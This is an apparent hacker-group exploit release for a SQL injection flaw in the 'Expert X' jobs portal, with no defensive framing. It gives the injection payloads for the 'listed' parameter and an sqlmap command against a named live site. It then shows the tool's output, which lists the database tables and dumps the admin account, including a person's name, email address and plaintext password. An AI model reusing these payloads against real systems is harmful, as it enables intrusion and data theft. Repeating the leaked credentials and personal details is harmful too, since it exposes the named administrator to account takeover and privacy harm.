┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : wvidesk.com │ │ │ │ Vendor : WVIDesk │ │ │ │ Software : Expert X - Jobs Portal and │ │ Expert X can manage jobs, courses, │ │ Resume Builder v. 1.0 │ │ events and scholarships. │ │ Vuln Type: Remote SQL Injection │ │ │ │ Method : GET │ │ │ │ Impact : Database Access │ │ │ │ │ │ │ │────────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost, Carlos132sp, ProGenius CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ GET parameter 'listed' is vulnerable. --- Parameter: listed (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))# --- [+] Starting the Attack sqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache, PHP 5.6.40 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [23:03:36] [INFO] fetching current database [23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers' current database: 'livexzfv_jobdreamers' fetching tables for database: 'livexzfv_jobdreamers' Database: livexzfv_jobdreamers [56 tables] +---------------------+ | adminMenu | | applyajob | | candidatefeedback | | candidatelogin | | candidateview | | clickcount | | controlall | | controlcategory | | coursecategory | | courseinstitute | | coursevisitsite | | eventcategory | | eventtype | | jobagentcountry | | jobalert | | jobcategory | | jobcity | | jobcompanyinfo | | jobcontinent | | jobcountry | | jobeducationsubject | | jobindustry | | jobmessage | | jobpostingprice | | jobquestion | | jobseniority | | jobuniversity | | jobusermaster | | jobusertype | | jobvisitsite | | mainmenu | | postacourse | | postaevent | | postajob | | postascholarship | | resumeaward | | resumecarsum | | resumecertificate | | resumecomment | | resumeeducation | | resumelanguage | | resumeprofessional | | resumepublication | | resumeresearch | | resumeskill | | resumesumexp | | resumetraining | | resumework | | scholarshipperiod | | seeker_profile | | seekers_admin | | siteAdmin | | siteadminuser | | tbl_countries | | tblpage | | userrole | +---------------------+ fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers' Database: livexzfv_jobdreamers Table: siteadminuser [8 columns] +----------+--------------+ | Column | Type | +----------+--------------+ | aflag | varchar(2) | | desig | varchar(200) | | enet | varchar(450) | | fullname | varchar(450) | | id | int(10) | | pw | varchar(25) | | role | int(10) | | users | varchar(200) | +----------+--------------+ fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers' Database: livexzfv_jobdreamers Table: siteadminuser [1 entry] +-------+------------+--------------------+------------------------+----+------+------+-------+ | aflag | desig | enet | fullname | id | pw | role | users | +-------+------------+--------------------+------------------------+----+------+------+-------+ | Y | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1 | 5664 | 1 | Kabir | +-------+------------+--------------------+------------------------+----+------+------+-------+ [-] Done